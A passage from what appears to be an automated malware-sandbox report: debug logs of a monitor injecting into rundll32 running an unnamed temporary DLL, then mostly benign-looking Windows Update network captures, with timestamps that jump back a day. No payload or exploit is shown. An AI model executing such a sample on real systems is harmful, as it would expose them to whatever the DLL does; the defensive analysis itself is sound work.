[modules.auxiliary.evtx] DEBUG: Wiping Application\n2025-11-15 08:47:10,442 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents\n2025-11-15 08:47:10,552 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer\n2025-11-15 08:47:10,695 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service\n2025-11-15 08:47:10,876 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts\n2025-11-15 08:47:10,956 [modules.auxiliary.evtx] DEBUG: Wiping Security\n2025-11-15 08:47:11,067 [modules.auxiliary.evtx] DEBUG: Wiping Setup\n2025-11-15 08:47:11,178 [modules.auxiliary.evtx] DEBUG: Wiping System\n2025-11-15 08:47:11,286 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell\n2025-11-15 08:47:11,419 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational\n2025-11-15 08:47:11,479 [root] INFO: Restarting WMI Service\n2025-11-15 08:47:13,657 [root] DEBUG: package modules.packages.dll does not support configure, ignoring\n2025-11-15 08:47:13,657 [root] WARNING: configuration error for package modules.packages.dll: error importing data.packages.dll: No module named 'data.packages'\n2025-11-15 08:47:13,657 [lib.core.compound] INFO: C:\\Users\\apogean\\AppData\\Local\\Temp already exists, skipping creation\n2025-11-15 08:47:13,694 [lib.api.process] INFO: Successfully executed process from path \"C:\\Windows\\System32\\rundll32.exe\" with arguments \"\"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\",#1\" with pid 1052\n2025-11-15 08:47:13,694 [lib.api.process] INFO: Monitor config for <Process 1052 rundll32.exe>: C:\\yzxx4c5b\\dll\\1052.ini\n2025-11-15 08:47:13,694 [lib.api.process] INFO: 32-bit DLL to inject is C:\\yzxx4c5b\\dll\\oLcKCMmD.dll, loader C:\\yzxx4c5b\\bin\\DbbZncw.exe\n2025-11-15 08:47:13,772 [root] DEBUG: Loader: Injecting process 1052 (thread 3260) with C:\\yzxx4c5b\\dll\\oLcKCMmD.dll.\n2025-11-15 08:47:13,788 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-11-15 08:47:13,788 [root] DEBUG: Successfully injected DLL C:\\yzxx4c5b\\dll\\oLcKCMmD.dll.\n2025-11-15 08:47:13,807 [lib.api.process] INFO: Injected into 32-bit <Process 1052 rundll32.exe>\n2025-11-15 08:47:15,811 [lib.api.process] INFO: Successfully resumed <Process 1052 rundll32.exe>\n2025-11-15 08:47:15,873 [root] DEBUG: 1052: Python path set to 'C:\\Users\\apogean\\AppData\\Local\\Programs\\Python\\Python311-32'.\n2025-11-15 08:47:15,873 [root] DEBUG: 1052: Disabling sleep skipping.\n2025-11-15 08:47:15,873 [root] DEBUG: 1052: Dropped file limit defaulting to 100.\n2025-11-15 08:47:15,951 [root] DEBUG: 1052: YaraInit: Compiled 43 rule files\n2025-11-15 08:47:15,983 [root] DEBUG: 1052: YaraInit: Compiled rules saved to file C:\\yzxx4c5b\\data\\yara\\capemon.yac\n2025-11-15 08:47:15,983 [root] DEBUG: 1052: YaraScan: Scanning 0x00960000, size 0x136e8\n2025-11-15 08:47:15,983 [root] DEBUG: 1052: Monitor initialised: 32-bit capemon loaded in process 1052 at 0x72220000, thread 3260, image base 0x960000, stack from 0x493000-0x4a0000\n2025-11-15 08:47:15,998 [root] DEBUG: 1052: Commandline: \"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\",#1\n2025-11-15 08:47:16,108 [root] DEBUG: 1052: hook_api: LdrpCallInitRoutine export address 0x77A32A30 obtained via GetFunctionAddress\n2025-11-15 08:47:16,108 [root] DEBUG: 1052: hook_api: Warning - CreateProcessA export address 0x76364110 differs from GetProcAddress -> 0x72A822A0 (AcLayers.DLL::0x222a0)\n2025-11-15 08:47:16,123 [root] DEBUG: 1052: hook_api: Warning - CreateProcessW export address 0x763488E0 differs from GetProcAddress -> 0x72A824E0 (AcLayers.DLL::0x224e0)\n2025-11-15 08:47:16,123 [root] DEBUG: 1052: hook_api: Warning - WinExec export address 0x7638E1C0 differs from GetProcAddress -> 0x72A827A0 (AcLayers.DLL::0x227a0)\n2025-11-15 08:47:16,186 [root] WARNING: b'Unable to place hook on GetCommandLineA'\n2025-11-15 08:47:16,186 [root] DEBUG: 1052: set_hooks: Unable to hook GetCommandLineA\n2025-11-15 08:47:16,186 [root] WARNING: b'Unable to place hook on GetCommandLineW'\n2025-11-15 08:47:16,186 [root] DEBUG: 1052: set_hooks: Unable to hook GetCommandLineW\n2025-11-15 08:47:16,264 [root] DEBUG: 1052: Hooked 625 out of 627 functions\n2025-11-15 08:47:16,264 [root] DEBUG: 1052: Syscall hook installed, syscall logging level 1\n2025-11-15 08:47:16,264 [root] DEBUG: 1052: RestoreHeaders: Restored original import table.\n2025-11-15 08:47:16,264 [root] INFO: Loaded monitor into process with pid 1052\n2025-11-15 08:47:16,280 [root] DEBUG: 1052: caller_dispatch: Added region at 0x00960000 to tracked regions list (ntdll::memcpy returns to 0x00965F1A, thread 3260).\n2025-11-15 08:47:16,280 [root] DEBUG: 1052: YaraScan: Scanning 0x00960000, size 0x136e8\n2025-11-15 08:47:16,280 [root] DEBUG: 1052: ProcessImageBase: Main module image at 0x00960000 unmodified (entropy change 0.000000e+00)\n2025-11-15 08:47:16,295 [root] DEBUG: 1052: InstrumentationCallback: Added region at 0x76352B4C (base 0x76330000) to tracked regions list (thread 3260).\n2025-11-15 08:47:16,295 [root] DEBUG: 1052: ProcessTrackedRegion: Region at 0x76330000 mapped as \\Device\\HarddiskVolume2\\Windows\\SysWOW64\\kernel32.dll is in known range, skipping\n2025-11-15 08:47:16,311 [root] DEBUG: 1052: ProcessTrackedRegion: Region at 0x76330000 mapped as \\Device\\HarddiskVolume2\\Windows\\SysWOW64\\kernel32.dll is in known range, skipping\n2025-11-15 08:47:16,436 [root] DEBUG: 1052: InstrumentationCallback: Added region at 0x7607413C (base 0x75F30000) to tracked regions list (thread 3260).\n2025-11-15 08:47:16,436 [root] DEBUG: 1052: ProcessTrackedRegion: Region at 0x75F30000 mapped as \\Device\\HarddiskVolume2\\Windows\\SysWOW64\\KernelBase.dll is in known range, skipping\n2025-11-15 08:47:16,483 [root] DEBUG: 1052: DLL loaded at 0x730A0000: C:\\Windows\\SYSTEM32\\TextShaping (0x94000 bytes).\n2025-11-15 08:47:16,514 [root] DEBUG: 1052: DLL loaded at 0x73AE0000: C:\\Windows\\system32\\uxtheme (0x74000 bytes).\n2025-11-15 08:47:16,530 [root] DEBUG: 1052: DLL loaded at 0x76620000: C:\\Windows\\System32\\MSCTF (0xd4000 bytes).\n2025-11-15 08:47:16,561 [root] DEBUG: 1052: set_hooks_by_export_directory: Hooked 0 out of 627 functions\n2025-11-15 08:47:16,561 [root] DEBUG: 1052: DLL loaded at 0x74E50000: C:\\Windows\\SYSTEM32\\kernel.appcore (0xf000 bytes).\n2025-11-15 08:47:16,577 [root] DEBUG: 1052: DLL loaded at 0x75E60000: C:\\Windows\\System32\\bcryptPrimitives (0x5f000 bytes).\n2025-11-15 08:47:16,586 [root] DEBUG: 1052: DLL loaded at 0x73F80000: C:\\Windows\\SYSTEM32\\ntmarta (0x29000 bytes).\n2025-11-15 08:47:16,586 [root] DEBUG: 1052: DLL loaded at 0x71E40000: C:\\Windows\\System32\\CoreMessaging (0x9b000 bytes).\n2025-11-15 08:47:16,591 [root] DEBUG: 1052: DLL loaded at 0x72EB0000: C:\\Windows\\SYSTEM32\\wintypes (0xdb000 bytes).\n2025-11-15 08:47:16,591 [root] DEBUG: 1052: DLL loaded at 0x71EE0000: C:\\Windows\\System32\\CoreUIComponents (0x27e000 bytes).\n2025-11-15 08:47:16,591 [root] DEBUG: 1052: DLL loaded at 0x72160000: C:\\Windows\\SYSTEM32\\textinputframework (0xba000 bytes).\n2025-11-15 08:47:27,194 [root] DEBUG: 588: TLS 1.2 secrets logged to: C:\\zFLSjDX\\tlsdump\\tlsdump.log\n2025-11-14 04:25:26,025 [root] INFO: Analysis timeout hit, terminating analysis\n2025-11-14 04:25:26,025 [lib.api.process] INFO: Terminate event set for <Process 1052 rundll32.exe>\n2025-11-14 04:25:26,025 [root] DEBUG: 1052: Terminate Event: Attempting to dump process 1052\n2025-11-14 04:25:27,572 [root] DEBUG: 1052: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-11-14 04:25:27,588 [lib.api.process] INFO: Termination confirmed for <Process 1052 rundll32.exe>\n2025-11-14 04:25:27,588 [root] INFO: Terminate event set for process 1052\n2025-11-14 04:25:27,588 [root] INFO: Created shutdown mutex\n2025-11-14 04:25:27,588 [root] DEBUG: 1052: Terminate Event: monitor shutdown complete for process 1052\n2025-11-14 04:25:28,603 [root] INFO: Shutting down package\n2025-11-14 04:25:28,603 [root] INFO: Stopping auxiliary modules\n2025-11-14 04:25:28,603 [root] INFO: Stopping auxiliary module: Browser\n2025-11-14 04:25:28,603 [root] INFO: Stopping auxiliary module: Curtain\n2025-11-14 04:25:28,822 [lib.common.results] INFO: Uploading file C:\\curtain.log to curtain/1763123128.8223877.curtain.log; Size is 4096; Max size: 100000000\n2025-11-14 04:25:28,838 [root] INFO: Stopping auxiliary module: Evtx\n2025-11-14 04:25:28,838 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Application.evtx to zip dump\n2025-11-14 04:25:28,853 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\HardwareEvents.evtx to zip dump\n2025-11-14 04:25:28,853 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Internet Explorer.evtx to zip dump\n2025-11-14 04:25:28,869 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Key Management Service.evtx to zip dump\n2025-11-14 04:25:28,869 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Security.evtx to zip dump\n2025-11-14 04:25:28,869 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Setup.evtx to zip dump\n2025-11-14 04:25:28,884 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\System.evtx to zip dump\n2025-11-14 04:25:28,884 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\\Windows PowerShell.evtx to zip dump\n2025-11-14 04:25:28,916 [modules.auxiliary.evtx] DEBUG: Uploading evtx.zip to host\n2025-11-14 04:25:28,916 [lib.common.results] INFO: Uploading file evtx.zip to evtx/evtx.zip; Size is 32064; Max size: 100000000\n2025-11-14 04:25:28,931 [root] INFO: Stopping auxiliary module: Procmon\n","errors":[]},"network":{"pcap_sha256":"1bd62a01b1b7849f9436395a7f1791f13c4fa2168dea458c04d433ab10ea48ba","hosts":[{"ip":"52.109.44.110","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"72.153.5.129","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"23.218.90.51","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"72.153.5.137","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"23.62.41.126","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"23.209.193.217","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"135.232.92.34","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"150.171.28.12","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"184.24.98.54","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"199.232.210.172","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"23.58.95.152","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"23.58.95.138","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"13.107.246.48","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"20.190.146.38","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"104.91.59.106","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"104.91.59.130","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"14.102.231.204","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"23.38.50.202","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"52.123.129.14","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"23.212.254.112","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]},{"ip":"104.46.162.226","country_name":"unknown","asn":"","asn_name":"","hostname":"","inaddrarpa":"","ports":[]}],"domains":[],"tcp":[{"src":"192.168.122.71","sport":49753,"dst":"104.46.162.226","dport":443,"offset":24,"time":0},{"src":"192.168.122.71","sport":49746,"dst":"52.123.129.14","dport":443,"offset":1132,"time":4.491070032119751},{"src":"192.168.122.71","sport":49683,"dst":"23.38.50.202","dport":80,"offset":1557,"time":4.52820897102356},{"src":"192.168.122.71","sport":49755,"dst":"20.190.146.38","dport":443,"offset":5367,"time":7.3674890995025635},{"src":"192.168.122.71","sport":49756,"dst":"20.190.146.38","dport":443,"offset":15921,"time":7.43644905090332},{"src":"192.168.122.71","sport":49757,"dst":"14.102.231.204","dport":80,"offset":26383,"time":7.494611978530884},{"src":"192.168.122.71","sport":49727,"dst":"13.107.246.48","dport":443,"offset":26987,"time":7.6508519649505615},{"src":"192.168.122.71","sport":49758,"dst":"14.102.231.204","dport":80,"offset":52358,"time":7.837268114089966},{"src":"192.168.122.71","sport":49760,"dst":"14.102.231.204","dport":80,"offset":53994,"time":8.243498086929321},{"src":"192.168.122.71","sport":49762,"dst":"23.58.95.138","dport":80,"offset":59188,"time":13.471807956695557},{"src":"192.168.122.71","sport":49763,"dst":"23.58.95.152","dport":80,"offset":59834,"time":13.473128080368042},{"src":"192.168.122.71","sport":49765,"dst":"14.102.231.204","dport":80,"offset":7588081,"time":17.795416116714478},{"src":"192.168.122.71","sport":49766,"dst":"104.46.162.226","dport":443,"offset":30616542,"time":30.347222089767456},{"src":"192.168.122.71","sport":49768,"dst":"104.91.59.130","dport":80,"offset":39051602,"time":37.27705407142639},{"src":"192.168.122.71","sport":49767,"dst":"104.91.59.106","dport":80,"offset":39052142,"time":37.27793502807617},{"src":"192.168.122.71","sport":49769,"dst":"14.102.231.204","dport":80,"offset":40721311,"time":37.434438943862915},{"src":"192.168.122.71","sport":49770,"dst":"14.102.231.204","dport":80,"offset":70800176,"time":48.20283389091492},{"src":"192.168.122.71","sport":49771,"dst":"14.102.231.204","dport":80,"offset":84535836,"time":53.44338893890381},{"src":"192.168.122.71","sport":49772,"dst":"14.102.231.204","dport":80,"offset":89112545,"time":55.12815308570862},{"src":"192.168.122.71","sport":49773,"dst":"14.102.231.204","dport":80,"offset":139707645,"time":72.32174491882324},{"src":"192.168.122.71","sport":49774,"dst":"14.102.231.204","dport":80,"offset":141093217,"time":81.70914793014526},{"src":"192.168.122.71","sport":49775,"dst":"14.102.231.204","dport":80,"offset":142181287,"time":91.00901198387146},{"src":"192.168.122.71","sport":49776,"dst":"14.102.231.204","dport":80,"offset":147197757,"time":110.9072151184082},{"src":"192.168.122.71","sport":49777,"dst":"20.190.146.38","dport":443,"offset":149613590,"time":123.63972806930542},{"src":"192.168.122.71","sport":49778,"dst":"14.102.231.204","dport":80,"offset":151148211,"time":130.69043588638306},{"src":"192.168.122.71","sport":49779,"dst":"14.102.231.204","dport":80,"offset":152174494,"time":136.72069311141968},{"src":"192.168.122.71","sport":49781,"dst":"104.91.59.130","dport":80,"offset":156003366,"time":152.73491406440735},{"src":"192.168.122.71","sport":49780,"dst":"104.91.59.106","dport":80,"offset":156003905,"time":152.73606395721436},{"src":"192.168.122.71","sport":49782,"dst":"20.190.146.38","dport":443,"offset":349813338,"time":218.62622690200806},{"src":"192.168.122.71","sport":49785,"dst":"23.212.254.112","dport":443,"offset":349850713,"time":264.64726090431213}],"udp":[{"src":"192.168.122.71","sport":56867,"dst":"192.168.122.1","dport":53,"offset":662,"time":3.0554490089416504},{"src":"192.168.122.71","sport":65387,"dst":"192.168.122.1","dport":53,"offset":3983,"time":6.602866888046265},{"src":"192.168.122.71","sport":49797,"dst":"192.168.122.1","dport":53,"offset":5026,"time":7.157042026519775},{"src":"192.168.122.71","sport":54090,"dst":"192.168.122.1","dport":53,"offset":39691,"time":7.692573070526123},{"src":"192.168.122.71","sport":64947,"dst":"192.168.122.1","dport":53,"offset":56193,"time":10.951642990112305},{"src":"192.168.122.71","sport":61510,"dst":"192.168.122.1","dport":53,"offset":56598,"time":11.110265970230103},{"src":"192.168.122.71","sport":55952,"dst":"192.168.122.1","dport":53,"offset":56923,"time":11.498348951339722},{"src":"192.168.122.71","sport":63662,"dst":"192.168.122.1","dport":53,"offset":58139,"time":12.508946895599365},{"src":"192.168.122.71","sport":64473,"dst":"192.168.122.1","dport":53,"offset":58241,"time":12.51788592338562},{"src":"192.168.122.71","sport":63473,"dst":"192.168.122.1","dport":53,"offset":62344,"time":13.548141956329346},{"src":"192.168.122.71","sport":56746,"dst":"192.168.122.1","dport":53,"offset":765416,"time":13.637569904327393},{"src":"192.168.122.71","sport":50947,"dst":"192.168.122.1","dport":53,"offset":765517,"time":13.659717082977295},{"src":"192.168.122.71","sport":58822,"dst":"192.168.122.1","dport":53,"offset":2845857,"time":14.524619102478027},{"src":"192.168.122.71","sport":52657,"dst":"192.168.122.1","dport":53,"offset":3401478,"time":15.093657970428467},{"src":"192.168.122.71","sport":54617,"dst":"192.168.122.1","dport":53,"offset":8949939,"time":18.6390221118927},{"src":"192.168.122.71","sport":56244,"dst":"192.168.122.1","dport":53,"offset":10064582,"time":19.267611980438232},{"src":"192.168.122.71","sport":54876,"dst":"192.168.122.1","dport":53,"offset":10620162,"time":19.74019193649292},{"src":"192.168.122.71","sport":51333,"dst":"192.168.122.1","dport":53,"offset":14520556,"time":22.265891075134277},{"src":"192.168.122.71","sport":137,"dst":"192.168.122.1","dport":137,"offset":16056492,"time":23.001708984375},{"src":"192.168.122.71","sport":56189,"dst":"192.168.122.1","dport":53,"offset":16064164,"time":23.002031087875366},{"src":"192.168.122.71","sport":54433,"dst":"224.0.0.252","dport":5355,"offset":16069048,"time":23.00248408317566},{"src":"192.168.122.71","sport":56192,"dst":"192.168.122.1","dport":53,"offset":16361069,"time":23.032903909683228},{"src":"192.168.122.71","sport":56114,"dst":"192.168.122.1","dport":53,"offset":16373737,"time":23.049041032791138},{"src":"192.168.122.71","sport":52775,"dst":"192.168.122.1","dport":53,"offset":16394182,"time":23.134582996368408},{"src":"192.168.122.71","sport":53194,"dst":"192.168.122.1","dport":53,"offset":21178748,"time":25.5954909324646},{"src":"192.168.122.71","sport":57772,"dst":"192.168.122.1","dport":53,"offset":21178850,"time":25.596734046936035},{"src":"192.168.122.71","sport":51419,"dst":"192.168.122.1","dport":53,"offset":24183247,"time":27.12466597557068},{"src":"192.168.122.71","sport":62442,"dst":"192.168.122.1","dport":53,"offset":31209879,"time":30.688009023666382},{"src":"192.168.122.71","sport":50858,"dst":"192.168.122.1","dport":53,"offset":35515959,"time":35.05170011520386},{"src":"192.168.122.71","sport":55639,"dst":"224.0.0.252","dport":5355,"offset":35520860,"time":35.127301931381226},{"src":"192.168.122.71","sport":58460,"dst":"224.0.0.252","dport":5355,"offset":35527128,"time":35.129010915756226},{"src":"192.168.122.71","sport":138,"dst":"192.168.122.255","dport":138,"offset":47584069,"time":39.81338810920715},{"src":"192.168.122.71","sport":49496,"dst":"192.168.122.1","dport":53,"offset":47931370,"time":40.124013900756836},{"src":"192.168.122.71","sport":56501,"dst":"224.0.0.252","dport":5355,"offset":47951604,"time":40.12581396102905},{"src":"192.168.122.71","sport":61551,"dst":"192.168.122.1","dport":53,"offset":62642136,"time":45.24574303627014},{"src":"192.168.122.71","sport":54301,"dst":"192.168.122.1","dport":53,"offset":74291363,"time":49.581263065338135},{"src":"192.168.122.71","sport":57288,"dst":"192.168.122.1","dport":53,"offset":74293061,"time":49.62503790855408},{"src":"192.168.122.71","sport":54682,"dst":"192.168.122.1","dport":53,"offset":92413270,"time":56.26534700393677},{"src":"192.168.122.71","sport":52641,"dst":"192.168.122.1","dport":53,"offset":115778732,"time":64.31397795677185},{"src":"192.168.122.71","sport":58786,"dst":"192.168.122.1","dport":53,"offset":128143432,"time":68.29185390472412},{"src":"192.168.122.71","sport":53220,"dst":"192.168.122.1","dport":53,"offset":140128745,"time":74.57409310340881},{"src":"192.168.122.71","sport":62994,"dst":"192.168.122.1","dport":53,"offset":140590843,"time":77.98991203308105},{"src":"192.168.122.71","sport":60100,"dst":"192.168.122.1","dport":53,"offset":140917115,"time":80.43291997909546},{"src":"192.168.122.71","sport":52949,"dst":"192.168.122.1","dport":53,"offset":141114134,"time":82.03927707672119},{"src":"192.168.122.71","sport":137,"dst":"192.168.122.255","dport":137,"offset":141144319,"time":82.47173690795898},{"src":"192.168.122.71","sport":59690,"dst":"192.168.122.1","dport":53,"offset":141319997,"time":84.04982709884644},{"src":"192.168.122.71","sport":63872,"dst":"192.168.122.1","dport":53,"offset":141465391,"time":85.05850601196289},{"src":"192.168.122.71","sport":49770,"dst":"192.168.122.1","dport":53,"offset":142197292,"time":91.09865498542786},{"src":"192.168.122.71","sport":61512,"dst":"192.168.122.1","dport":53,"offset":142422605,"time":92.49086308479309},{"src":"192.168.122.71","sport":62896,"dst":"192.168.122.1","dport":53,"offset":144837706,"time":101.3786849975586},{"src":"192.168.122.71","sport":53591,"dst":"192.168.122.1","dport":53,"offset":145799130,"time":104.537113904953},{"src":"192.168.122.71","sport":61434,"dst":"192.168.122.1","dport":53,"offset":147248496,"time":111.3104190826416},{"src":"192.168.122.71","sport":50339,"dst":"192.168.122.1","dport":53,"offset":148230284,"time":116.56716299057007},{"src":"192.168.122.71","sport":62573,"dst":"192.168.122.1","dport":53,"offset":151060723,"time":130.1927900314331},{"src":"192.168.122.71","sport":64370,"dst":"192.168.122.1","dport":53,"offset":152143138,"time":136.22589302062988},{"src":"192.168.122.71","sport":63935,"dst":"192.168.122.1","dport":53,"offset":153067356,"time":141.64666199684143},{"src":"192.168.122.71","sport":60214,"dst":"192.168.122.1","dport":53,"offset":154028944,"time":144.8700408935547},{"src":"192.168.122.71","sport":58470,"dst":"192.168.122.1","dport":53,"offset":184893358,"time":157.7529399394989},{"src":"192.168.122.71","sport":51632,"dst":"192.168.122.1","dport":53,"offset":218950619,"time":163.70560789108276},{"src":"192.168.122.71","sport":57049,"dst":"192.168.122.1","dport":53,"offset":255303637,"time":169.9826900959015},{"src":"192.168.122.71","sport":56331,"dst":"192.168.122.1","dport":53,"offset":294021176,"time":176.679682970047},{"src":"192.168.122.71","sport":52462,"dst":"224.0.0.252","dport":5355,"offset":323613240,"time":182.01897406578064},{"src":"192.168.122.71","sport":65416,"dst":"192.168.122.1","dport":53,"offset":334516749,"time":183.9507908821106},{"src":"192.168.122.71","sport":55524,"dst":"192.168.122.1","dport":53,"offset":349811084,"time":187.79713010787964},{"src":"192.168.122.71","sport":50513,"dst":"192.168.122.1","dport":53,"offset":349811790,"time":195.9781939983368},{"src":"192.168.122.71","sport":53348,"dst":"192.168.122.1","dport":53,"offset":349812280,"time":209.6638150215149},{"src":"192.168.122.71","sport":52623,"dst":"192.168.122.1","dport":53,"offset":349812624,"time":217.55621099472046},{"src":"192.168.122.71","sport":54435,"dst":"192.168.122.1","dport":53,"offset":349817807,"time":218.9519259929657},{"src":"192.168.122.71","sport":53028,"dst":"192.168.122.1","dport":53,"offset":349818578,"time":229.76046991348267},{"src":"192.168.122.71","sport":60891,"dst":"192.168.122.1","dport":53,"offset":349849635,"time":242.131000995636},{"src":"192.168.122.71","sport":59960,"dst":"192.168.122.1","dport":53,"offset":349850065,"time":257.5831050872803}],"icmp":[],"http":[{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=32505856-33554431\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.5\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196465.981339},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=103809024-104333311\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: kjofpJMLf0OQ34afHprSCA.0.2.13.1.1.10\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com","body":"","path":"/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196466.323995},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=104333312-104857599\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: kjofpJMLf0OQ34afHprSCA.0.2.13.1.1.11\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com","body":"","path":"/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196466.730225},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=192937984-193986559\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.6\r\nContent-Length: 0\r\nHost: 